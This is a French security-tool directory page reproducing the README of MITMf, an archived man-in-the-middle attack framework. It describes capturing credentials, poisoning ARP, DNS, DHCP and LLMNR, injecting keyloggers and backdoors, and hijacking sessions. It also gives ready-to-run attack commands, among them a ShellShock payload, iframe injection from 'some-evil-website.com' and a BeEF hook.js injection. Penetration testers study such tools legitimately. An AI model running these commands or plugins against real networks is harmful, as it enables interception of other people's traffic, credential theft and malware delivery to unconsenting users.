Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
MITMf — Framework pour les attaques de l'homme du milieu | Kitploit
Outils/GitHubGitHub/byt3bl33d3r/mitmf
Sniffing et Analyse de PaquetsExploitationHameçonnageSécurité WebSécurité RéseauTests d'IntrusionCommandement et ContrôleIngénierie SocialeAuthentificationRed TeamingAnalyse DNSArchived
3.6k1.0k11il y a 8 ansVérifié par Kitploit
GitHub
byt3bl33d3r/mitmf

MITMf

Framework pour les attaques de l'homme du milieu

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Supported Python versions Latest Version Supported OS Code Climate Build Status Coverage Status

MITMf

Framework pour les attaques Man-In-The-Middle

Ce projet n'est plus mis à jour. MITMf a été écrit pour répondre au besoin, à l'époque, d'un outil moderne pour effectuer des attaques Man-In-The-Middle. Depuis, de nombreux autres outils ont été créés pour combler ce créneau, vous devriez probablement utiliser Bettercap car il est bien plus complet et mieux maintenu.

Tutoriels rapides, exemples et mises à jour pour développeurs sur : https://byt3bl33d3r.github.io

Cet outil est basé sur sergio-proxy et tente de relancer et mettre à jour le projet.

Contactez-moi à :

  • Twitter : @byt3bl33d3r
  • IRC sur Freenode : #MITMf
  • Email : [email protected]

Avant de soumettre des problèmes, veuillez lire la appropriée dans le wiki.

Télécharger l’outil
section

Installation

Veuillez vous référer au wiki pour les instructions d'installation

Description

MITMf vise à fournir une solution tout-en-un pour les attaques Man-In-The-Middle et réseau, tout en mettant à jour et en améliorant les attaques et techniques existantes.

Initialement conçu pour pallier les lacunes importantes d'autres outils (par exemple Ettercap, Mallory), il a été presque entièrement réécrit à partir de zéro pour fournir un framework modulaire et facilement extensible que tout le monde peut utiliser pour implémenter sa propre attaque MITM.

Fonctionnalités

  • Le framework contient un serveur SMB, HTTP et DNS intégré qui peut être contrôlé et utilisé par les différents plugins. Il contient également une version modifiée du proxy SSLStrip qui permet la modification HTTP et un contournement partiel de HSTS.

  • Depuis la version 0.9.8, MITMf supporte le filtrage et la manipulation actifs de paquets (essentiellement ce que faisaient les etterfilters, mais en mieux), permettant aux utilisateurs de modifier tout type de trafic ou protocole.

  • Le fichier de configuration peut être modifié à la volée pendant que MITMf est en cours d'exécution ; les changements sont propagés dans le framework : cela permet d'ajuster les paramètres des plugins et des serveurs pendant une attaque.

  • MITMf capture les identifiants FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (chaînes de communauté), NTLMv1/v2 (tous les protocoles supportés comme HTTP, SMB, LDAP, etc.) et Kerberos en utilisant Net-Creds, qui est lancé au démarrage.

  • L'intégration de Responder permet l'empoisonnement LLMNR, NBT-NS et MDNS ainsi que le support d'un serveur WPAD rogue.

Filtrage et modification actifs de paquets

Vous pouvez désormais modifier n'importe quel paquet/protocole intercepté par MITMf en utilisant Scapy ! (fini les etterfilters ! ouf !)

Par exemple, voici un petit filtre stupide qui change simplement l'adresse IP de destination des paquets ICMP :

root@kitploit:~
if packet.haslayer(ICMP):
	log.info('Got an ICMP packet!')
	packet.dst = '192.168.1.0'
  • Utilisez la variable packet pour accéder au paquet dans un format compatible Scapy
  • Utilisez la variable data pour accéder aux données brutes du paquet

Pour utiliser le filtre, il suffit de faire : python mitmf.py -F ~/filter.py

Vous voudrez probablement combiner cela avec le plugin Spoof pour intercepter réellement les paquets de quelqu'un d'autre ;)

Remarque : vous pouvez modifier les filtres à la volée sans redémarrer MITMf !

Exemples

L'utilisation la plus basique, lance le proxy HTTP, les serveurs SMB, DNS, HTTP et Net-Creds sur l'interface enp3s0 :

python mitmf.py -i enp3s0

Empoisonner ARP tout le sous-réseau avec la passerelle à 192.168.1.1 en utilisant le plugin Spoof :

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1

Idem + un serveur proxy rogue WPAD en utilisant le plugin Responder :

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad

Empoisonner ARP 192.168.1.16-45 et 192.168.0.1/24 avec la passerelle à 192.168.1.1 :

python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1

Activer l'empoisonnement DNS tout en empoisonnant ARP (les domaines à usurper sont tirés du fichier de configuration) :

python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1

Activer l'empoisonnement LLMNR/NBTNS/MDNS :

python mitmf.py -i enp3s0 --responder --wredir --nbtns

Activer l'empoisonnement DHCP (le pool d'IP et le sous-réseau sont tirés du fichier de configuration) :

python mitmf.py -i enp3s0 --spoof --dhcp

Idem avec une charge utile ShellShock qui sera exécutée si un client est vulnérable :

python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

Injecter un IFrame HTML en utilisant le plugin Inject :

python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com

Injecter un script JS :

python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js

Démarrer un portail captif qui redirige tout vers http://SERVER/PATH :

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH

Démarrer un portail captif sur http://votre-ip/portal.html en utilisant la page par défaut /portal.html (merci responder) et /CaptiveClient.exe (non inclus) depuis le dossier config/captive :

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive

Idem mais avec le nom d'hôte captive.portal au lieu de l'IP (nécessite que captive.portal résolve vers votre IP, par exemple via l'empoisonnement DNS) :

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns

Servir un portail captif avec une instance supplémentaire SimpleHTTPServant le dossier LOCALDIR sur http://IP:8080 (changer le port dans mitmf.config) :

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR

Idem mais avec un nom d'hôte :

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns

Et bien plus encore !

Bien sûr, vous pouvez mélanger et associer presque tous les plugins (par exemple, ARP spoof + inject + Responder, etc.)

Pour une liste complète des options disponibles, exécutez simplement python mitmf.py --help

Plugins actuellement disponibles

  • HTA Drive-By : Injecte une fausse notification de mise à jour et invite les clients à télécharger une application HTA
  • SMBTrap : Exploite la vulnérabilité 'SMB Trap' sur les clients connectés
  • ScreenShotter : Utilise HTML5 Canvas pour capturer une capture d'écran précise du navigateur d'un client
  • Responder : Empoisonneur LLMNR, NBT-NS, WPAD et MDNS
  • SSLstrip+ : Contourne partiellement HSTS
  • Spoof : Redirige le trafic via l'empoisonnement ARP, ICMP, DHCP ou DNS
  • BeEFAutorun : Exécute automatiquement des modules BeEF en fonction du système d'exploitation ou du type de navigateur du client
  • AppCachePoison : Effectue des attaques d'empoisonnement du cache HTML5 App
  • Ferret-NG : Détourne de manière transparente les sessions clients
  • BrowserProfiler : Tente d'énumérer tous les plugins du navigateur des clients connectés
  • FilePwn : Backdoor des exécutables envoyés via HTTP en utilisant Backdoor Factory et BDFProxy
  • Inject : Injecte du contenu arbitraire dans le contenu HTML
  • BrowserSniper : Effectue des attaques drive-by sur les clients dont les plugins de navigateur sont obsolètes
  • JSkeylogger : Injecte un keylogger Javascript dans les pages web d'un client
  • Replace : Remplace du contenu arbitraire dans le contenu HTML
  • SMBAuth : Déclenche des tentatives d'authentification par défi-réponse SMB
  • Upsidedownternet : Retourne les images à 180 degrés
  • Captive : Crée un portail captif, redirigeant les requêtes HTTP avec un 302

Comment financer ma réserve de thé et de sushi

BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU

ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee

LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr